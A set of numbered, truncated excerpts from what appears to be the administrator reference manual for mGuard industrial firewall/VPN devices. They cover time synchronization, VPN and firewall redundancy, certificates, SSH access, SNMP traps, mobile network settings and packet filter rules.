The following rules apply for routing entries: If multiple routing entries for the destination of a data packet match, then the smallest network defined in the routing entries that matches the data packet destination determines which route this packet takes.
Example: The external route of t
368. reached. You should also set the system time if the menu item Update System time is set to Yes under the positioning system (under Network >> Mobile Network >> Positioning system).
The date and time are specified in the format YYYY.MM.DD HH:MM:SS (YYYY = year, MM = month, DD = day, HH = hour, MM = minute, SS = second).
If a current local time that differs from Greenwich Mean Time is to be displayed under Current system time, you must enter the number of hours that your local time is ahead of or behind Greenwich Mean Time. Example: in Berlin, the time is one hour ahead of GMT. Therefore, enter CET-1. In New York, the time is five hours behind Greenwich Mean Time. Therefore, enter CET+5. The only important thing is the -1, +2, etc. value, as only these values are evaluated, not the preceding letters. They can be CET or any other designation, such as UTC. If you wish to display Central European Time (e.g. for Germany) and have it automatically switch to/from daylight saving time, enter CET-1CEST,M3.5.0,M10.5.0/3.
If this option is set to Yes, the mGuard writes the current system time to its memory every two hours. If the mGuard is switched off and then on again, a time from this two-hour time slot is displayed, not a time on January 1, 2000.
NTP (Network Time Protocol): The mGuard can act as the NTP server for computers that are connected to its LAN port. In this case, the compute
369. rent scan. The menu in the web interface has been extended so that you can now see the status of each scan. The progress indicator shows the number of checked files.
3.2.2 VPN extensions
The setting for the VPN connection is now divided into Disabled, Started and Stopped. The Disabled setting ignores the VPN connection as if this were not configured. This also means it cannot be dynamically enabled/disabled. The other two settings determine the status of the VPN connection when it is restarted or booted.
In Version 8.0, the VPN connections can be started or stopped via a button on the web interface, via text message, an external switch or the script nph-vpn.cgi. This takes into account all VPN connections. Packets that correspond to a VPN connection that is not disabled are forwarded when the connection is established, or dropped if the connection is not established. VPN connections which were set to Active: No in the previous versions are now interpreted as Disabled.
In Version 8.0, the names of VPN connections are made unique. During the update, a hash or unique number is added to names that are duplicated.
You can set a timeout which aborts the VPN connection if it has been started via text message, nph-vpn.cgi or the web interface. VPN connections which have been started by an explicit request via an application are not affected.
VPN tunnels which only differ in their source network can now
370. replaced, it must first be configured with the old password before it is connected.
How to proceed in the event of an incorrect password: If you have inadvertently entered an incorrect password on an mGuard, proceed as follows.
If you can still remember the old password:
- Reconfigure the mGuard on which the incorrect password was entered so that it uses the old password.
- Wait until the mGuard indicates that the old password is being used.
- Then enter the correct password.
If you have forgotten the old password:
- Check whether you can read the old password out from the other mGuard.
- If the other mGuard is disabled or missing, you can simply enter the correct new password on the active mGuard on which you inadvertently set the incorrect password. Make sure that the other mGuard is assigned the same password before operating it again.
- If the other mGuard is already using the new password, you must make sure that the mGuard with the incorrect password is not active or able to be activated, e.g. by removing the cable at the LAN or WAN interface. In the case of remote access, you can enter a destination for the connectivity check that will not respond.
Prior to provoking this kind of error, check that there is no redundancy error on any of the mGuard devices. One mGuard must be active and the other must be on standby. It might be necessary to rectify any errors displayed and o
371. rewall Redundancy >> Redundancy
How to proceed in the event of an incorrect password: If you have inadvertently entered an incorrect password on an mGuard, you cannot simply reenter the password using the correct one. Otherwise, in the event of adverse circumstances, this may result in both mGuard devices being active.
Case 1: only one mGuard has an incorrect password. The process of changing the password has not yet begun on the other mGuard.
- Reconfigure the mGuard on which the incorrect password was entered so that it uses the old password.
- Wait until the mGuard indicates that the old password is being used.
- Then enter the correct password.
Case 2: the other mGuard is already using the new password.
- The status of both mGuard devices must be such that they are using an old password but expecting a new one (red cross). To ensure that this is the case, enter random passwords successively.
- Finally, generate a secure password and enter it on both mGuard devices. This password is used immediately, without any coordination. During this process, the state of the mGuard on standby may briefly switch to "outdated". However, this situation resolves itself automatically.
Encryption Algorithm: DES, 3DES, AES-128, AES-192, AES-256 (see Algorithms on page 280).
Hash Algorithm: MD5, SHA-1, SHA-256, SHA-512 (see Algorithms on page 280).
Interface for state synchronization: Interface which is ... Internal Interface / Dedicated Inter
372. ries. An attacker can also falsify RADIUS responses and gain access to the mGuard if they know the user names. These user names are transmitted as plain text with the RADIUS request. The attacker can thus simulate RADIUS queries and thereby find out user names and the corresponding passwords.
Administrative access to the mGuard should remain possible while the RADIUS server password is being changed. Proceed as follows to ensure this:
- Set up the RADIUS server for the mGuard a second time with a new password.
- Also set this new password on the RADIUS server.
- On the mGuard, delete the line containing the old password.
7.4 Authentication >> Certificates
Certificate, Self-signed certificates, Certificate (machine certificate): Authentication is a fundamental element of secure communication. The X.509 authentication method relies on certificates to ensure that the correct partners communicate with each other and that no incorrect partner is involved in communication. An incorrect communication partner is one who falsely identifies themselves as someone they are not (see glossary under X.509 certificate on page 363). A certificate is used as proof of the identity of the certificate owner. The relevant authorizing body in this case is the CA (certification authority). The digital signature on the certificate is provided by the CA. By prov
373. ries to be transmitted to the external log server specified below, select Yes.
Log Server IP address: Specify the IP address of the log server to which the log entries should be transmitted via UDP. An IP address must be specified, not a host name. This function does not support name resolution because it might not be possible to make log entries if a DNS server failed.
Log Server port: Specify the port of the log server to which the log entries should be transmitted via UDP. Default: 514.
Logging >> Settings: If SysLog messages should be transmitted to a SysLog server via a VPN channel, the IP address of the SysLog server must be located in the network that is specified as the Remote network in the definition of the VPN connection. The internal IP address must be located in the network that is specified as Local in the definition of the VPN connection (see IPsec VPN >> Connections >> Edit >> General).
If the IPsec VPN >> Connections >> Edit >> General, Local option is set to 1:1 NAT (see page 263), the following applies: The internal IP address must be located in the specified local network.
If the IPsec VPN >> Connections >> Edit >> General, Remote option is set to 1:1 NAT (see page 265), the following applies: The IP address of the SysLog server must be located in the network that is specified as Remote i
374. rk >> General
Network menu, Probe targets: Here you can enter the probe targets as host names or IP addresses. The ping type can be configured separately for each probe target: ICMP Ping (ICMP echo request / ICMP echo reply), DNS Ping (DNS query to UDP port 53), IKE Ping (IPsec IKE query to UDP port 500).
Ping types: IKE Ping determines whether a VPN gateway can be reached at the IP address specified. ICMP Ping determines whether a device can be reached at the IP address specified. This is the most common ping test. However, the response to this ping test is disabled on some devices. This means that they do not respond even though they can be reached. DNS Ping determines whether an operational DNS server can be reached at the IP address specified. A generic request is sent to the DNS server with the specified IP address, and every DNS server that can be reached responds to this request.
The probe targets are processed in the specified order.
Probe Interval: Indicates the time between two tests in minutes. Value: 2-60, default 5.
Number of times all probes need to fail before the mobile network connection is considered stalled: Number of repeats before the mobile network connection is considered to be aborted. Value: 1-5, default 3.
6.7.2 SIM Settings
The mGuard rs4000/rs2000 3G can be equippe
375. rk connection.
Port On: Switches the Ethernet connection on or off. The Port On function is not supported by mGuard centerport. The Port On function is supported with restrictions on: mGuard delta (the internal side switch ports cannot be switched off); mGuard pci in driver mode (the internal network interface cannot be switched off; however, this is possible in power-over-PCI mode).
Port Mirroring: The port mirroring function enables any packets to be forwarded to a specific recipient. You can select the receiver port or the mirroring of the incoming and outgoing packets from each switch port.
Link supervision: Only visible when the Link supervision menu item under Management >> Service I/O >> Alarm output is set to Supervise. If link supervision is active, the alarm output is opened if one link does not indicate connectivity.
Address Resolution Table (only for devices with an internal switch): Port: Name of the Ethernet connection to which the row refers. MACs: Lists the MAC addresses of the connected Ethernet-capable devices. The switch can learn MAC addresses which belong to the ports of its connected Ethernet-capable devices. The contents of the list can be deleted by clicking the button.
Port Statistics (only for devices with an internal switch): A statistic is displayed for each physically accessible port of the integrated Managed Switch. The counter can be reset via the web interface or the following command. Only for devices with an inter
376. rk swapped round must also be implemented for VPN partners (see Remote on page 265).
Yes is not supported in Stealth network mode.
No (default): VPN connections exist separately. Yes: hub and spoke feature enabled; a control center diverts VPN connections to several branches that can also communicate with each other. With a star VPN connection topology, mGuard partners can also exchange data with one another. In this case, it is recommended that the local mGuard consults CA certificates for the authentication of partners (see Authentication on page 269). In the event of hub and spoke, 1:1 NAT of the partner is not supported.
No / Only when started via nph-vpn.cgi or CMD input: If errors occur when establishing VPN connections, the mGuard logging function can be used to find the source of the error based on corresponding entries (see Logging >> Browse local logs menu item). This option for error diagnostics is used as standard. Set this option to No (default) if it is sufficient.
Option Only when started via nph-vpn.cgi or CMD input: If the option of diagnosing VPN connection problems using the mGuard logging function is too impractical or insufficient, select this option. This may be the case if the following conditions apply:
IPsec VPN menu, IPsec VPN >> Global >> Options: In certain application env
377. rlCfgBackup (1); additional: mGuardTrapBladeRackID, mGuardTrapBladeSlotNr, mGuardTrapBladeCtrlCfgBackup. This trap is sent when configuration backup is triggered for the mGuard blade controller.
enterprise-oid: mGuardTrapBladeCtrlCfg; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapBladeCtrlCfgRestored (2); additional: mGuardTrapBladeRackID, mGuardTrapBladeSlotNr, mGuardTrapBladeCtrlCfgRestored. This trap is sent when configuration restoration is triggered from the mGuard blade controller.
Management >> SNMP >> Trap
CIFS integrity traps: Successful integrity check of a CIFS share; Failed integrity check of a CIFS share; Found a suspicious difference on a CIFS share. This menu item is not included in the scope of functions for the mGuard rs2000 3G / mGuard rs2000.
Userfirewall traps: This menu item is not included in the scope of functions for the mGuard rs2000 3G / mGuard rs2000.
Management menu: Activate traps: Yes / No. enterprise-oid: mGuardTrapCIFSScan; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapCIFSScanInfo (1); additional: mGuardTResCIFSShare, mGuardTResCIFSScanError, mGuardTResCIFSNumDiffs. This trap is sent if the CIFS integrity check has been successfully completed.
Activate traps: Yes / No. enterprise-oid: mGuardTrapCIFSScan; generic-trap: enterpriseS
378. rom, To, Port, Action, Comment, Log, Log entries for unknown connection attempts.
Protocol: All means TCP, UDP, ICMP, GRE and other IP protocols.
From IP / To IP: 0.0.0.0/0 means all IP addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24).
Port: Only evaluated for TCP and UDP protocols. any refers to any port; startport:endport (e.g. 110:120) refers to a port area. Individual ports can be specified using the port number or the corresponding service name (e.g. 110 for pop3, or pop3 for 110).
Action: Accept means that the data packets may pass through. Reject means that the data packets are sent back and the sender is informed of their rejection. Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not informed of their whereabouts.
Comment: Freely selectable comment for this rule.
Log: For each individual firewall rule, you can specify whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, default setting).
Log entries for unknown connection attempts: Yes / No. When set to Yes, all connection attempts that are not covered by the rules defined above are logged.
Firewall rules for outgoing PPP connections from the LAN interface: The parameters correspond to those under Incoming Rules (PPP). These outgoing rules apply to data packets that are sent out via a data link initiated by PPP dial-in.
379. rom the computer and the corresponding responses are forwarded, due to the nature of Stealth mode.
DHCP Servers to relay to: A list of one or more DHCP servers to which DHCP requests should be forwarded.
Append Relay Agent Information (Option 82): When forwarding, additional information for the DHCP servers to which information is being forwarded can be appended according to RFC 3046.
Network menu
6.6 Network >> Proxy Settings
6.6.1 HTTP(S) Proxy Settings
[Screenshot: Network >> Proxy Settings >> HTTP(S) Proxy Settings; fields: Use Proxy for HTTP and HTTPS (it is also used for VPN in TCP encapsulation), HTTP(S) Proxy Server (proxy.example.com), Port (3128), Proxy Authentication (Login, Password).]
A proxy server can be specified here for the following activities performed by the mGuard itself: CRL download; firmware update; regular configuration profile retrieval from a central location; restoring of licenses.
Network >> Proxy Settings >> HTTP(S) Proxy Settings
Use Proxy for HTTP and HTTPS: When set to Yes, connections that use the HTTP or HTTPS protocol are transmitted via a proxy server whose address and port should be specified in the next two fields.
HTTP(S) Proxy Server: Host name or IP address of the proxy server.
Port: Number of the port to be used, e.g. 3128.
Proxy Authentication, Login: User name
380. rotected with a PIN. The PIN is saved in the mGuard. The PIN is not displayed in the web browser. However, it is possible to overwrite or delete it. A PIN is used in the following cases: when the mGuard is restarted; when the SIM card is replaced; when the PIN is changed; when the SIM card is activated; for login to a mobile network provider.
Roaming enables or prevents dialing into foreign mobile networks. Dialing into another network can incur additional costs. When roaming is disabled, you can select a fixed provider. You can restrict the SIM card registration to a provider from the list. This selection is only active when roaming is disabled.
Network >> Mobile Network >> SIM Settings
Fields: Access Point Name (APN) of the provider, PPP authentication, PPP login name, PPP password, Secondary SIM slot, Maximum runtime of the fallback SIM until switching back to the primary SIM.
Access Point Name (APN) of the provider: Enter the name of the access gateway for the packet transmission of your mobile network provider. The APN can be obtained from your mobile network provider.
PPP authentication: This is required by some providers for the transmission of packet data. The access data must be entered for this.
PPP login name: Enter the PAP or CHAP user names to log on to the access gateway of the mobile network provider. This information can be obtained from your mobile
381. rs should be configured so that the local address of the mGuard is specified as the NTP server address. If the mGuard is operated in Stealth mode, the management IP address of the mGuard (if this is configured) must be used for the computers, or the IP address 1.1.1.1 must be entered as the local address of the mGuard.
For the mGuard to act as the NTP server, it must obtain the current date and the current time from an NTP server (time server). To do this, the address of at least one NTP server must be specified. This feature must also be activated.
Management menu, Management >> System Settings >> Time and Date
Enable NTP time synchronization: Once the NTP is activated, the mGuard obtains the date and time from one or more time server(s) and synchronizes itself with it or them. Initial time synchronization can take up to 15 minutes. During this time, the mGuard continuously compares the time data of the external time server and that of its own time so that this can be adjusted as accurately as possible. Only then can the mGuard act as the NTP server for the computers connected to its LAN interface and provide them with the system time.
An initial time synchronization with the external time server is performed after every booting process, unless the mGuard has a built-in clock (for mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard pci SD, mGuard delta) and for
382. rtner, which is set as the local VPN identifier on the client. VPN gateways use the VPN Identifier to detect which configurations belong to the same VPN connection. The following entries are valid for PSK: Empty (IP address used by default); an IP address; a host name with "@" prefix, e.g. @vpn1138.example.com; an e-mail address, e.g. piepiorra@example.com.
10.2.4 Firewall
[Screenshot: IPsec VPN >> Connections >> Edit (connection Mannheim-Leipzig), tab pages General, Authentication, Firewall, IKE Options; Firewall tab with Incoming and Outgoing rule tables (General firewall setting: Use the firewall ruleset below), each with one default rule: Protocol All, From IP 0.0.0.0/0, From Port any, To IP 0.0.0.0/0, To Port any, Action Accept, Comment "default rule, please adapt", Log No; Log entries for unknown connection attempts: No.]
Incoming/outgoing firewall: While the settings made under the Network Security menu item only relate to non-VPN connections (see above under Network Security menu on page 205), the settings here only relate to the VPN connection defined on these tab pages. If multiple VPN connections have been defined, you
383. rver of the mGuard. In Router mode with NAT or port forwarding, the port numbers for the CIFS server have priority over the rules for port forwarding. Port forwarding is set under Network >> NAT. Access to the CIFS server is approved internally, via incoming calls (dial-in) and VPN as standard, and can be restricted or expanded via the firewall rules. A different default setting can also be defined using these rules.
From IP: Enter the address of the computer/network from which remote access is permitted or forbidden in this field. IP address 0.0.0.0/0 means all addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24).
CIFS Integrity Monitoring >> CIFS AV Scan Connector
Columns: Interface, Action, Comment, Log. Consolidated Imported Enabled Shares: CIFS Share, Exported in Subdirectory.
Interface: External / Internal / External 2 / VPN / Dial-in / DMZ. Specifies to which interface the rule should apply. If no rules are set or if no rule applies, the following default settings apply: Remote access is permitted via Internal, VPN and Dial-in. Access via External, External 2 and DMZ is refused. Specify the access options according to your requirements. If you want to refuse access via Internal, VPN or Dial-in, you must implement this explicitly by
384. s: When set to Yes (default), the mGuard terminates the telephone connection as soon as no data traffic is transmitted over the time period specified under Idle time. The mGuard gives the connected modem the relevant command for terminating the telephone connection. When set to No, the mGuard does not give the connected modem a command for terminating the telephone connection.
Idle time: Default 300. If there is still no data traffic after the time specified here has elapsed, the mGuard can terminate the telephone connection (see above under Idle timeout).
Local IP: IP address of the serial interface of the mGuard, which now acts as the WAN interface. If this IP address is assigned dynamically by the Internet service provider, use the preset value 0.0.0.0. Otherwise, e.g. for the assignment of a fixed IP address, enter this here.
Remote IP: IP address of the partner. When connecting to the Internet, this is the IP address of the Internet service provider, which is used to provide access to the Internet. As the Point-to-Point Protocol (PPP) is used for the connection, the IP address does not usually have to be specified. This means you can use the preset value 0.0.0.0.
Netmask: The subnet mask specified here belongs to both the Local IP address and the Remote IP address. Normally, all three values (Local IP, Remote IP, Netmask) are either fixed or remain set to 0.0.0.0.
Enter the connection settings for an external modem on the Modem/Console tab page (see Mode
385. s RADIUS Authentication: Use RADIUS authentication for Shell access. Please note: Even if RADIUS is the only method for password authentication, root is still able to authenticate with the local password. X.509 Authentication: Enable X.509 certificates for SSH access. SSH server certificate (displayed when Enable X.509 certificates for SSH access is set to Yes). Client certificate / Authorized for access as. The mGuard must not be simultaneously configured via the web access, shell access or SNMP. Simultaneous configuration via the different access methods might lead to unexpected results. Innominate Security Technologies 105661_en_02. Management menu, Management >> System Settings >> Shell Access. Shell Access: When SSH remote access is enabled, the mGuard can be configured from remote computers using the command line. This option is disabled by default. NOTE: If remote access is enabled, ensure that secure passwords are defined for root and admin. Make the following settings for SSH remote access. Session Timeout (seconds): Specifies after what period of inactivity in seconds the session i
386. s X.509 Authentication / Enable X.509 certificates for SSH access: If No is selected, then only conventional authentication methods (user name and password, or private and public keys) are permitted, not the X.509 authentication method. (In the scope of functions for the mGuard rs2000 3G / mGuard rs2000.) If Yes is selected, then the X.509 authentication method can be used in addition to the conventional authentication methods (as also used for No). If Yes is selected, the following must be specified: how the mGuard authenticates itself to the SSH client according to X.509 (see SSH server certificate (1)); how the mGuard authenticates the remote SSH client according to X.509 (see SSH server certificate (2)). Management >> System Settings >> Shell Access. SSH server certificate (1): Specifies how the mGuard identifies itself to the SSH client. Select one of the machine certificates from the list, or the None entry. None: When None is selected, the SSH server of the mGuard does not authenticate itself to the SSH client via the X.509 certificate. Instead it uses a server key and thus behaves in the same way as older versions of the mGuard. If one of the machine certificates is selected, this is also offered to the SSH client. The client can then decide whether to use the conventional authentication method or the method acco
387. s automatically terminated (i.e. automatic logout). When set to 0 (default setting), the session is not terminated automatically. The specified value is also valid for shell access via the serial interface instead of via the SSH protocol. The effects of the Session Timeout field settings are temporarily ineffective if processing of a shell command exceeds the number of seconds set. In contrast, the connection can also be aborted if it is no longer able to function correctly (see "Delay between requests for a sign of life" on page 42). Enable SSH remote access: If you want to enable SSH remote access, set this option to Yes. Internal SSH access (i.e. from the directly connected LAN or from the directly connected computer) can be enabled independently of this setting. The firewall rules for the available interfaces must be defined on this page under Allowed Networks in order to specify differentiated access options on the mGuard. Management >> System Settings >> Shell Access. Port for incoming SSH connections (remote administration only): Default: 22. If this port number is changed, the new port number only applies for access via the External, External 2, VPN and Dial-in interface. Port number 22 still applies for internal access. Delay between requests for a sign of life: The remote partn
388. s not translated into an IP address that is identical for all devices, as is the case with Masquerading. If local devices transmit data packets, only those data packets are considered which: are actually encrypted by the mGuard (the mGuard only forwards packets via the VPN tunnel if they originate from a trustworthy source); have a source address within the network which is defined here under Local. The data packets are assigned a destination address from the network that is set under Remote. If necessary, the source address is also replaced (see Local). The data packets are then transmitted via the VPN tunnel. Type: Tunnel, Remote: Masquerade. Only one IP address (subnet mask /32) is permitted as the VPN network for this setting. The network to be masqueraded is translated to this IP address. The data packets are then transmitted via the VPN tunnel. Masquerading changes the source address and source port. The original addresses are recorded in an entry in the Conntrack table. Where response packets are received via the VPN tunnel and there is a matching entry in the Conntrack table, these packets have their destination address and destination port written back to them. Tunnel settings: IPsec/L2TP. If clients should connect via the mGuard by IPsec/L2TP
389. s of Dead Peer Detection (DPD) using the relevant configured time. This effect is beyond the influence of the mGuard. In the event of path redundancy caused by a network lobotomy, the VPN connections are no longer supported. A network lobotomy must be prevented whenever possible. X.509 certificates for VPN authentication: The mGuard supports the use of X.509 certificates when establishing VPN connections. This is described in detail under "Authentication" on page 269. However, there are some special points to note when X.509 certificates are used for authenticating VPN connections in conjunction with firewall redundancy and VPN redundancy. Switching machine certificates: A redundant pair can be configured so that it uses an X.509 certificate and the corresponding private key together to identify itself to a remote VPN partner as an individual virtual VPN instance. These X.509 certificates must be renewed regularly. If the VPN partner is set to check the validity period of the certificates, these certificates must be renewed before their validity expires (see "Certificate settings" on page 195). If a machine certificate is replaced, all VPN connections which use it are restarted by the mGuard. While this is taking place, the mGuard cannot forward any data via the affected VPN connections for a certain period of time. This period depends on the number of VPN connections affected
390. s operating the VPN connection, except in the event of a network lobotomy. Basic requirements for VPN redundancy: VPN redundancy does not have any of its own variables. It currently does not have its own menu in the user interface; it is activated together with firewall redundancy instead. VPN redundancy can only be used if the corresponding license has been purchased and installed on the mGuard. As VPN connections must be established for VPN redundancy, a corresponding VPN license is also necessary. If you only have the license for firewall redundancy and VPN connections are installed, VPN redundancy cannot be activated. An error message is displayed as soon as an attempt is made to use firewall redundancy. Only identical mGuard devices can be used together in a redundant pair. 16.2.1 Components in VPN redundancy: The components used in VPN redundancy are the same as described under firewall redundancy. One additional component is available here: VPN state synchronization. A small number of components are slightly expanded for VPN redundancy. However, the connectivity check, availability check and firewall state synchronization are all performed in the same way as before. VPN state synchronization: The mGuard supports the configuration of firewall rules for the VPN connection. VPN state synchronization monitors the state of the different VPN connections on the active mGuard. It ensures that the mGuard on standby receives
391. sMAC. This trap is sent when a DHCP request is received from an unknown client. enterprise-oid: mGuard; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapSSHLogin; additional: mGuardTResSSHUsername, mGuardTResSSHRemoteIP. This trap is sent when someone accesses the mGuard via SSH. enterprise-oid: mGuard; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapSSHLogout; additional: mGuardTResSSHUsername, mGuardTResSSHRemoteIP. This trap is sent when access to the mGuard via SSH is terminated. Activate traps: Yes/No. enterprise-oid: mGuardTrapSenderIndustrial; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapIndustrialPowerStatus (2); additional: mGuardTrapIndustrialPowerStatus. Sent when the system registers a power failure. enterprise-oid: mGuardTrapSenderIndustrial; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapSignalRelais (3); additional: mGuardTResSignalRelaisState, mGuardTResSignalRelaisReason, mGuardTResSignalRelaisReasonIdx. Sent after the signal contact is changed and indicates the current status: 0 = Off, 1 = On. Management >> SNMP >> Trap: Agent, external config storage, temperature, mGuard blade Controller, Blade status change traps (BLADE only), Blade reconfiguration.
392. screen. You can also open this area by clicking the letter icon. Configuration help. 2.4 Using the web interface: You can click on the desired configuration via the menu on the left-hand side, e.g. Management, Licensing. The page is then displayed in the main window, usually in the form of one or more tab pages, where settings can be made. If the page is organized into several tab pages, you can switch between them using the tabs at the top. Working with tab pages: You can make the desired entries on the corresponding tab page (see also "Working with sortable tables" on page 22). You can return to the previously accessed page by clicking on the Back button located at the bottom right of the page, if available. Entry of impermissible values: If you enter an impermissible value (e.g. an impermissible number in an IP address) and click on the Apply button, the relevant tab page title is displayed in red. This makes it easier to trace the error. Buttons: The following buttons are located at the top of every page. Logout: For logging out after configuration access to the mGuard. If the user does not log out, he/she is logged out automatically if there has been no further activity and the time period specified by the configuration has elapsed. Access can only be restored by logging in again. Reset: Resets to the original values. If you have en
393. section that contains the log ID and number in the relevant log entry, for example fw-https-access-1-1ec2c133-dca1-1231-bfa5-000cbe01010a. 2. Copy this section into the Jump to firewall rule field. 3. Click on Lookup.
394. see "Management >> Configuration Profiles" on page 74, "Configuration Pull" on page 91). Interruption of the connection at a certain time using PPPoE network mode: This is the case when Network Mode is set to PPPoE under the Network >> Interfaces, General menu item and Automatic Re-connect is set to Yes (see 6.1 "Network >> Interfaces", "Router network mode / PPPoE router mode" on page 127). Acceptance of certificates when the system time has not yet been synchronized: This is the case when the Wait for synchronization of the system time setting is selected under the Authentication >> Certificates, Certificate settings menu item for the Check the validity period of certificates and CRLs option (see "Authentication >> Certificates" and "Certificate settings" on page 195). CIFS integrity checking: The regular automatic check of the network drives is only started when the mGuard has a valid time and date (see the following section). The system time can be set or synchronized by various events. Synchronized by hardware clock: The mGuard has a built-in clock which has been synchronized with the current time at least once. A synchronized built-in clock ensures that the mGuard has a synchronized system time even after a restart. Synchronized manually: The administrator has defined the current time for the mGuard runtime by making a corresponding entry in the Local
395. shown by the partner, PLUS, if required, Remote certificates (if used as a filter). The partner can additionally provide sub-CA certificates. In this case the mGuard can form the set union for creating the chain from the CA certificates provided and the self-configured CA certificates. The corresponding root CA certificate must always be available on the mGuard. See "Management >> Web Settings" on page 56, "Access" on page 57. Authentication for VPN: If the partner shows a machine certificate signed by a CA, the mGuard authenticates the partner using the Remote certificate, or all CA certificates that form the chain to the root CA certificate together with the certificate shown by the partner. If the partner shows a self-signed machine certificate, the mGuard authenticates the partner using the Remote certificate. NOTE: It is not sufficient to simply install the certificates to be used on the mGuard under Authentication >> Certificates. In addition, the mGuard certificate imported from the pool that is to be used must be referenced in the relevant applications (VPN, SSH, HTTPS). The remote certificate for authentication of a VPN connection or the channels of a VPN connection is installed in the IPsec VPN >> Connections menu. Authentication menu. 7.4.1 Certificate settings. Authentication >> Certificates >> Certificate settings. Machine C
396. side, the initiator must first detect the interruption and then reestablish the connection. VPN redundancy supports masquerading in the same way as without VPN redundancy. This applies when a redundant pair is masked by a NAT gateway with a dynamic IP address. For example, a redundant pair can be hidden behind a DSL router which masks the redundant pair with an official IP address. This DSL router forwards the IPsec data traffic (IKE and ESP, UDP ports 500 and 4500) to the virtual IP addresses. If the dynamic IP address changes, all active VPN connections which run via the NAT gateway are reestablished. The connections are reestablished by means of Dead Peer Detection (DPD) using the relevant configured time. This effect is beyond the influence of the mGuard. The redundancy function on the mGuard does not support path redundancy. Path redundancy can be achieved using other methods, e.g. by using a router pair. This router pair is seen on the virtual side of the mGuard devices. By contrast, on the other side, each of the routers has different connections. Path redundancy must not use NAT mechanisms such as masquerading to hide the virtual IP addresses of the mGuard devices. Otherwise a migration from one path to another would change the IP addresses used to mask the redundant pair. This would mean that all VPN connections (all ISAKMP SAs and all IPsec SAs) would have to be reestablished. The connections are reestablished by mean
397. sitional data: Positioning data valid. Number of Satellites: 6. Latitude of the current position: 52.43213. Longitude of the current position: 13.53620. Show in OpenStreetMap. Network >> Mobile Network >> Positioning system, Settings / Current position. Enable positioning engine: When you enable this function, the position of the mGuard is determined. Update System time: Enables time synchronization through the positioning system in use. When setting Yes, enter the local system time under Management >> System Settings >> Time and Date. Validity of the positional data: Indicates whether valid positioning data is available for the mGuard. Number of Satellites: Displays the number of available GPS/GLONASS satellites for the mGuard which are available for position determination. At least two satellites must be available. Four available satellites are required for precise position determination. The longitude and latitude can be precisely determined to 10 m. Values: 0 to 24. Latitude of the current position: Displays the current latitude of the mGuard position. Longitude of the current position: Displays the current longitude of the mGuard position. Show in OpenStreetMap: When you enable this function, the position data of the mGuard is displayed. A functional Int
399. state of the mGuard devices. State monitoring ensures that the active mGuard mirrors its data onto the other mGuard (state synchronization). 16.1.3 Firewall redundancy settings from previous versions: Existing configuration profiles on firmware version 6.1.x and earlier can be imported with certain restrictions. For information, please contact Innominate. 16.1.4 Requirements for firewall redundancy: To use the redundancy function, both mGuards must have the same firmware. The firewall redundancy function can only be activated when a valid license key is installed. See under Redundancy >> Firewall Redundancy >> Redundancy >> Enable redundancy. Redundancy >> Firewall Redundancy >> Redundancy >> Interface which is used for state synchronization: The Dedicated interface value is only accepted on mGuards which have more than two physical and separate Ethernet interfaces. This is currently the mGuard centerport. Each set of targets for the connectivity check can contain more than ten targets. A fail-over time cannot be guaranteed without an upper limit. Redundancy >> Firewall Redundancy >> Redundancy >> External interface >> Primary targets for ICMP echo requests; >> External interface >> Secondary targets for ICMP echo requests; >> Internal interface >> Primary targets for ICMP echo requests; >> Internal interface >> Secondary
400. strial rs. Connection of the service contacts is described in the user manual for the devices (UM EN MGUARD DEVICES). A push button or an on/off switch can be connected to the inputs. One or more freely selectable VPN connections or firewall rule records can be switched via the corresponding switch. A mixture of VPN connections and firewall rule records is also possible. The web interface displays which VPN connections and which firewall rule records are connected to this input. The push button or on/off switch is used to establish and release predefined VPN connections or to activate defined firewall rule records. You can set whether to monitor specific VPN connections or firewall rule records and to display them using LEDs. If VPN connections are being monitored, an illuminated LED indicates that VPN connections are established. The alarm output monitors the function of the mGuard and therefore enables remote diagnostics. The associated LED lights up red if the alarm output is open due to an error. The alarm output reports the following, if it has been activated: failure of the redundant supply voltage; monitoring of the link status of the Ethernet connections; monitoring of the temperature condition; monitoring of the connection state of the internal modem. 4.7.1 Service I/O. Management >> Service I/O >> Service I/O: Alarm output, Input CMD 1
401. t CRL Upload: If the CRL is available as a file, it can also be loaded on the mGuard manually. To do this, click on Browse, select the file and click on Import. Remember to save the imported CRL along with the other entries by clicking on the Apply button. An up-to-date CRL file must always be used. For this reason it is not included in the mGuard configuration. When exporting an mGuard configuration and then importing it to another mGuard, the CRL file must be uploaded again. CRL files might be deleted during a firmware update. In this case the mGuard downloads the CRL files from the specified URL again. Alternatively, it can be uploaded manually. Network Security menu. 8 Network Security menu: This menu is not available on the mGuard blade controller. A reduced version of the menu is available on the mGuard rs2000 3G. 8.1 Network Security >> Packet Filter: The mGuard includes a Stateful Packet Inspection Firewall. The connection data of an active connection is recorded in a database (connection tracking). Rules can thus only be defined for one direction. This means that data from the other direction of the relevant connection, and only this data, is automatically allowed through. A side effect is that existing connections are not aborted during reconfiguration, even if a corresponding new connection can no longer be established. D
402. t User Firewall Templates. Timeout type (static/dynamic): With a static timeout, users are logged out automatically as soon as the set timeout time has elapsed. With dynamic timeout, users are logged out automatically after all the connections have been closed by the user or have expired on the mGuard and the set timeout time has elapsed. An mGuard connection is considered to have expired if no more data is sent for this connection over the following periods. Connection expiration period after non-usage: TCP: 5 days (this value can be set, see "Timeout for established TCP connections (seconds)" on page 218); 120 seconds are added after closing the connection (this also applies to connections closed by the user). UDP: 30 seconds after data traffic in one direction; 180 seconds after data traffic in both directions. ICMP: 30 seconds. Others: 10 minutes. VPN connection: Specifies the VPN connection for which this user firewall rule is valid. This requires an existing remote access through the VPN tunnel to the web interface. Network Security >> User Firewall >> User Firewall Templates >> Edit > Template users. Users: Specify the names of the users here. The names must correspond to those that
